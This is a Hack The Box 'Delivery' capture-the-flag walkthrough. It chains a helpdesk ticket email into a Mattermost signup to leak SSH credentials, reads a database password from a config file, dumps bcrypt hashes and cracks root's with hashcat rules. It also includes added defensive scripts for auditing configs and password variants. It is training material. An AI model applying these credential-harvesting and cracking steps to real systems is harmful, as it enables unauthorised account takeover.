Delivery-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: analysing logic flaws in web application functionality, chaining the features of two web applications against each other, an internal chat platform leaking account credentials and default-password hints, sensitive information disclosure in a web application configuration file, and cracking database user password hashes with hashcat.

Reference: https://www.youtube.com/watch?v=HqGKuHfoRIQ

Reference: https://0xdf.gitlab.io/2021/05/22/htb-delivery.html

Reference: https://khaoticdev.net/hack-the-box-delivery/

0x01 Obtaining user access

1. Get the target IP address: 10.10.10.222

2. Compared with the previous boxes, the vulnerabilities in this one are quite different, and I was stuck for a long time until I read a walkthrough to understand how to solve it.

3. A port scan shows the following open ports:

sudo nmap -sT -sV -sC -O -p"22,80,8065," "10.10.10.222"

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sun, 10 Dec 2023 13:24:12 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: ty17t6tc17b9tktyw18m7gphdo
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 10 Dec 2023 13:31:36 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Sun, 10 Dec 2023 13:31:36 GMT
|_ Content-Length: 0

4. Port 80 serves a landing page with hints.

5. From the site on port 80 we discover two hostnames, delivery.htb and helpdesk.delivery.htb; bind them in the local hosts file:

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.222 helpdesk.delivery.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.222 helpdesk.delivery.htb

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.222 delivery.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.222 delivery.htb

6. Port 8065 is a Mattermost platform; no vulnerability was found in the platform itself.

7. helpdesk.delivery.htb is a ticketing site. Putting together what we learned from the various attempts: Mattermost requires registration, but only an address under the @delivery.htb domain is accepted, while the ticketing site lets us read mail sent to @delivery.htb mailboxes. That combination is the vulnerability.

8. Through the ticketing site we open a support ticket to obtain an @delivery.htb address.

test, 

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 5993601.

If you want to add more information to your ticket, just email 5993601@delivery.htb.

Thanks,

Support Team

9. Using the ticket number above, view the conversation thread for the ticket.

10. Then register an account 5993601@delivery.htb on the Mattermost site and click to send the verification email.

http://10.10.10.222:8065/should_verify_email?email=5993601%40delivery.htb

11. After the verification email has been sent, go back and check the ticket thread for the reply.

12. We now have the registration link; click it to activate the account and log in to Mattermost.

13. Reading the messages on the main channel, we obtain two useful pieces of information:

SSH credentials for the initial foothold:
maildeliverer:Youve_G0t_Mail!

The base password that many of the account passwords are variants of:
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"

14. Logging in as the first account, maildeliverer, gives us the first flag.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh maildeliverer@10.10.10.222
The authenticity of host '10.10.10.222 (10.10.10.222)' can't be established.
ED25519 key fingerprint is SHA256:AGdhHnQ749stJakbrtXVi48e6KTkaMj/+QNYMW+tyj8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.222' (ED25519) to the list of known hosts.
maildeliverer@10.10.10.222's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ cat /home/maildeliverer/user.txt
d7ca1583e91db305a765fc0ee6c3b21e
maildeliverer@Delivery:~$

0x02 Obtaining root access

15. Through continued enumeration we find the database configuration under the Mattermost installation directory.

maildeliverer@Delivery:~$ 
maildeliverer@Delivery:~$ cd /opt
maildeliverer@Delivery:/opt$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 14 2021 .
drwxr-xr-x 19 root root 4096 Jul 14 2021 ..
drwxrwxr-x 12 mattermost mattermost 4096 Jul 14 2021 mattermost
maildeliverer@Delivery:/opt$ cd mattermost/
maildeliverer@Delivery:/opt/mattermost$ ls -la
total 288
drwxrwxr-x 12 mattermost mattermost 4096 Jul 14 2021 .
drwxr-xr-x 3 root root 4096 Jul 14 2021 ..
drwxrwxr-x 2 mattermost mattermost 4096 Dec 18 2020 bin
drwxrwxr-x 7 mattermost mattermost 4096 Dec 26 2020 client
drwxrwxr-x 2 mattermost mattermost 4096 Dec 26 2020 config
drwxrwxr-x 3 mattermost mattermost 4096 Dec 10 08:24 data
-rw-rw-r-- 1 mattermost mattermost 2052 Dec 18 2020 ENTERPRISE-EDITION-LICENSE.txt
drwxrwxr-x 2 mattermost mattermost 4096 Dec 18 2020 fonts
drwxrwxr-x 2 mattermost mattermost 4096 Dec 18 2020 i18n
drwxrwxr-x 2 mattermost mattermost 4096 Dec 26 2020 logs
-rw-rw-r-- 1 mattermost mattermost 898 Dec 18 2020 manifest.txt
-rw-rw-r-- 1 mattermost mattermost 229264 Dec 18 2020 NOTICE.txt
drwxr--r-- 5 mattermost mattermost 4096 Dec 10 08:31 plugins
drwxrwxr-x 2 mattermost mattermost 4096 Dec 18 2020 prepackaged_plugins
-rw-rw-r-- 1 mattermost mattermost 6262 Dec 18 2020 README.md
drwxrwxr-x 2 mattermost mattermost 4096 Dec 18 2020 templates
maildeliverer@Delivery:/opt/mattermost$ cd config/
maildeliverer@Delivery:/opt/mattermost/config$ ls -la
total 36
drwxrwxr-x 2 mattermost mattermost 4096 Dec 26 2020 .
drwxrwxr-x 12 mattermost mattermost 4096 Jul 14 2021 ..
-rw-rw-r-- 1 mattermost mattermost 922 Dec 18 2020 cloud_defaults.json
-rw-rw-r-- 1 mattermost mattermost 18774 Dec 10 08:24 config.json
-rw-rw-r-- 1 mattermost mattermost 243 Dec 18 2020 README.md
maildeliverer@Delivery:/opt/mattermost/config$ cat config.json

{

"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",

}
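The config.json above is world-readable and carries the database password inside the DSN, which is all the next step needs. As an added example (not part of this writeup), a small audit script that reads a Mattermost config.json (in Mattermost's layout the DataSource sits under SqlSettings) and reports both conditions; the sample file it writes is constructed with a placeholder password and the 664 mode seen on the box.

```python
import json
import os
import re
import stat
import tempfile

# Go MySQL DSN layout used by Mattermost: user:password@tcp(host:port)/db?params
DSN_RE = re.compile(r"^(?P<user>[^:@]+)(?::(?P<password>[^@]*))?@(?P<rest>.+)$")

def redact_dsn(dsn: str) -> str:
    """Return the DSN with its password masked, safe to include in a report."""
    m = DSN_RE.match(dsn)
    if not m or not m.group("password"):
        return dsn
    return f"{m.group('user')}:***@{m.group('rest')}"

def audit_mattermost_config(path: str) -> list:
    """Report the two weaknesses this box relied on: a DB password embedded in
    SqlSettings.DataSource, and a config file readable by other local users."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"config readable by group/others: {stat.filemode(mode)}")
    with open(path, encoding="utf-8") as fh:
        cfg = json.load(fh)
    dsn = cfg.get("SqlSettings", {}).get("DataSource", "")
    m = DSN_RE.match(dsn)
    if m and m.group("password"):
        findings.append(f"DataSource embeds a password for '{m.group('user')}': "
                        f"{redact_dsn(dsn)}")
    return findings

def write_sample_config(password: str, mode: int) -> str:
    """Write a constructed config.json (placeholder password) with the given mode."""
    cfg = {"SqlSettings": {"DriverName": "mysql", "DataSource":
           f"mmuser:{password}@tcp(127.0.0.1:3306)/mattermost"
           "?charset=utf8mb4,utf8&readTimeout=30s&writeTimeout=30s"}}
    fd, path = tempfile.mkstemp(suffix=".json")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        json.dump(cfg, fh)
    os.chmod(path, mode)
    return path

if __name__ == "__main__":
    sample = write_sample_config("EXAMPLE_PASSWORD", 0o664)  # the mode seen on the box
    for finding in audit_mattermost_config(sample):
        print("FINDING:", finding)
```

Restricting the file to the service account (mode 600) clears the first finding; the second only goes away when the DSN stops carrying a password, for example by reading it from an environment variable or secrets store.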

16. Connecting to that database, we find the bcrypt password hash of the root user.

maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 196
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
46 rows in set (0.001 sec)

MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username | Password |
+----------------------------------+--------------------------------------------------------------+
| surveybot | |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| qaz | $2a$10$trDVpnppobkTKLkYqfjmFuulzPIYOmGPK99tkfBRAAbxN70S/ye2i |
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| test | $2a$10$WU.F6XBeCE4pZ1dU/e7YLevj0HHWYxinODpDRcifL/dqM9X6NmIwq |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport | |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
11 rows in set (0.001 sec)

MariaDB [mattermost]>

17. Next comes cracking the hash. Since we learned earlier that the passwords are variants of PleaseSubscribe!, we use that as the base word and let hashcat derive the final password from it.

┌──(kali㉿kali)-[~/桌面]
└─$ echo 'root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > hash

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

┌──(kali㉿kali)-[~/桌面]
└─$ echo 'PleaseSubscribe!' > passwd

┌──(kali㉿kali)-[~/桌面]
└─$ cat passwd
PleaseSubscribe!

### Looking at the password hashes, we see they are in bcrypt format, indicated by the $2a$ prefix. Recalling the message in the root Mattermost channel, we can likely crack the password using "PleaseSubscribe!" as a template. For that we use hashcat together with the "best64" rule.

┌──(kali㉿kali)-[~/桌面]
└─$ hashcat -m 3200 --username 'root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' passwd -r /usr/share/hashcat/rules/best64.rule
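The Mattermost message asked for a program that stops people reusing variants of "PleaseSubscribe!", and the best64 run above shows why appending digits or swapping characters buys nothing. As an added example (not from the writeup), a password-policy check that normalises case, leetspeak and appended digits or symbols before comparing a candidate against a banned base word; the substitution table, the 0.8 similarity threshold and the candidate passwords are constructed assumptions.

```python
import difflib
import re

# Substitutions that rule-based cracking (hashcat's best64 and similar rule sets)
# applies automatically, so the policy must treat the substituted word as the same
# word. Assumed table; extend it to match the patterns seen in your own audits.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})

def normalize(password: str) -> str:
    """Lower-case, drop leading/trailing digits and symbols ("!21", "2023"),
    then undo leetspeak, so PleaseSubscribe!2023 and Pl3as3Subscribe compare equal."""
    p = password.lower()
    p = re.sub(r"^[^a-z]+|[^a-z]+$", "", p)
    return p.translate(LEET)

def is_variant(candidate: str, banned: str, threshold: float = 0.8) -> bool:
    """True if the candidate is the banned base word, contains it (forwards or
    reversed), or is within the similarity threshold of it after normalisation."""
    c, b = normalize(candidate), normalize(banned)
    if not c or not b:
        return False
    if b in c or b in c[::-1]:
        return True
    return difflib.SequenceMatcher(None, c, b).ratio() >= threshold

def check_policy(candidate: str, banned_bases) -> str:
    """Return the banned base the candidate is a variant of, or '' if it passes."""
    for base in banned_bases:
        if is_variant(candidate, base):
            return base
    return ""

if __name__ == "__main__":
    # Constructed candidates; "PleaseSubscribe!" is the base named in the Mattermost channel.
    banned = ["PleaseSubscribe!"]
    for pw in ["PleaseSubscribe!2023", "Pl3as3Subscr1be!", "!ebircsbuSesaelP", "Tr0ub4dor&3"]:
        hit = check_policy(pw, banned)
        print(f"{pw:22} -> {'REJECT (variant of ' + hit + ')' if hit else 'ok'}")
```

Run at password-change time, this rejects exactly the family of passwords that a single rule file recovers from one leaked base word.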

18. With the recovered password, switch to the root account and read the final flag.

maildeliverer@Delivery:/opt/mattermost/config$ su root
Password:
root@Delivery:/opt/mattermost/config# cat /root/root.txt
fd785ce2433e677c6988165a9a0daf4b
root@Delivery:/opt/mattermost/config#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/308


Delivery-htb-writeup
https://sh1yan.top/2023/12/10/Delivery-htb-writeup/
Author: shiyan
Published: December 10, 2023
License